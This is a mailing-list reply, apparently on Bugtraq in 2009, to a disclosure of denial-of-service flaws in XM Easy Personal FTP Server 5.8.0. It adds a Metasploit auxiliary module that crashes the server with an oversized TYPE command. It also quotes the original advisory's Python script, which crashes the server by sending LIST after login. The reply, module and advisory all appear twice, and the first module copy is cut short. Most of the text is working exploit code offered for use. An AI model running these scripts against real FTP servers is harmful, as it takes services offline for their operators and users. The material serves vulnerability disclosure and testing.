Hi,
It's seem to have much more bugs then what you listed in your advisory.
It's possible to DoS the server with this 3 others commands;
HELP ('A' * 90000)
NLST ('A' * 90000)
TYPE ('A' * 90000)
Here is an auxiliary module for metasploit...
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.8.0 Type DoS',
'Description' => %q{
You need a valid login to DoS this FTP server, but
even anonymous can do it as long as it has permission
to call Type.
},
'Author' => 'Francis Provencher, Protek Research Lab',
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' => [
[ 'URL', ' http://protekresearch.blogspot.com]
],
'DisclosureDate' => '2009/11/10')
)
> From: zhangmc (at) mail.ustc.edu (dot) cn [email concealed] <zhangmc (at) mail.ustc.edu (dot) cn [email concealed]>
> Subject: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Received: Tuesday, November 10, 2009, 3:07 AM
> Date of Discovery: 10-Nov-2009
>
> Credits:zhangmc[at]mail.ustc.edu.cn
>
> Vendor: Dxmsoft
>
> Affected:
> XM Easy Personal FTP Server 5.8.0
> Earlier versions may also be affected
>
> Overview:
> XM Easy Personal FTP Server is a easy use FTP server
> Application. Denial of service vulnerability exists in XM
> Personal FTP Server that causes the application to crash
> when the "LIST" is sent to FTP server if you do not use
> "PASV" or "POST" first.
>
> Details:
> XM Easy Personal FTP Server can't handle "LIST" command if
> you do not use "PASV" or "POST" first.If you have logged on
> the server successfully,a "LIST" command will lead the ftp
> server to crash.
>
> Severity:
> High
>
> Exploit example:
> #!/usr/bin/python
> import socket
> import sys
>
> def Usage():
> print ("Usage: ./expl.py
> <serv_ip> <Username>
> <password>\n")
> print ("Example:./expl.py 192.168.48.183
> anonymous anonymous\n")
> if len(sys.argv) <> 4:
> Usage()
> sys.exit(1)
> else:
> hostname=sys.argv[1]
> username=sys.argv[2]
> passwd=sys.argv[3]
> sock = socket.socket(socket.AF_INET,
> socket.SOCK_STREAM)
> try:
> sock.connect((hostname, 21))
> except:
> print ("Connection error!")
> sys.exit(1)
> r=sock.recv(1024)
> sock.send("user %s\r\n" %username)
> r=sock.recv(1024)
> sock.send("pass %s\r\n" %passwd)
> r=sock.recv(1024)
> sock.send("LIST\r\n")
> sock.close()
> sys.exit(0);
>
>
>
__________________________________________________________________
The new Internet Explorer® 8 - Faster, safer, easier. Optimized for Yahoo! Get it Now for Free! at http://downloads.yahoo.com/ca/internetexplorer/
It's seem to have much more bugs then what you listed in your advisory.
It's possible to DoS the server with this 3 others commands;
HELP ('A' * 90000)
NLST ('A' * 90000)
TYPE ('A' * 90000)
Here is an auxiliary module for metasploit...
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.8.0 Type DoS',
'Description' => %q{
You need a valid login to DoS this FTP server, but
even anonymous can do it as long as it has permission
to call Type.
},
'Author' => 'Francis Provencher, Protek Research Lab',
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' => [
[ 'URL', ' http://protekresearch.blogspot.com]
],
'DisclosureDate' => '2009/11/10')
)
# They're required
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
])
end
def run
return unless connect_login
raw_send_recv("TYPE #{'A' * 90000}\r\n")
disconnect
print_status("OK, server may still be technically listening, but it won't respond")
end
end
have a nice Day!
--- On Tue, 11/10/09, zhangmc (at) mail.ustc.edu (dot) cn [email concealed] <zhangmc (at) mail.ustc.edu (dot) cn [email concealed]> wrote:
> From: zhangmc (at) mail.ustc.edu (dot) cn [email concealed] <zhangmc (at) mail.ustc.edu (dot) cn [email concealed]>
> Subject: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Received: Tuesday, November 10, 2009, 3:07 AM
> Date of Discovery: 10-Nov-2009
>
> Credits:zhangmc[at]mail.ustc.edu.cn
>
> Vendor: Dxmsoft
>
> Affected:
> XM Easy Personal FTP Server 5.8.0
> Earlier versions may also be affected
>
> Overview:
> XM Easy Personal FTP Server is a easy use FTP server
> Application. Denial of service vulnerability exists in XM
> Personal FTP Server that causes the application to crash
> when the "LIST" is sent to FTP server if you do not use
> "PASV" or "POST" first.
>
> Details:
> XM Easy Personal FTP Server can't handle "LIST" command if
> you do not use "PASV" or "POST" first.If you have logged on
> the server successfully,a "LIST" command will lead the ftp
> server to crash.
>
> Severity:
> High
>
> Exploit example:
> #!/usr/bin/python
> import socket
> import sys
>
> def Usage():
> print ("Usage: ./expl.py
> <serv_ip> <Username>
> <password>\n")
> print ("Example:./expl.py 192.168.48.183
> anonymous anonymous\n")
> if len(sys.argv) <> 4:
> Usage()
> sys.exit(1)
> else:
> hostname=sys.argv[1]
> username=sys.argv[2]
> passwd=sys.argv[3]
> sock = socket.socket(socket.AF_INET,
> socket.SOCK_STREAM)
> try:
> sock.connect((hostname, 21))
> except:
> print ("Connection error!")
> sys.exit(1)
> r=sock.recv(1024)
> sock.send("user %s\r\n" %username)
> r=sock.recv(1024)
> sock.send("pass %s\r\n" %passwd)
> r=sock.recv(1024)
> sock.send("LIST\r\n")
> sock.close()
> sys.exit(0);
>
>
>
__________________________________________________________________
The new Internet Explorer® 8 - Faster, safer, easier. Optimized for Yahoo! Get it Now for Free! at http://downloads.yahoo.com/ca/internetexplorer/
[ reply ]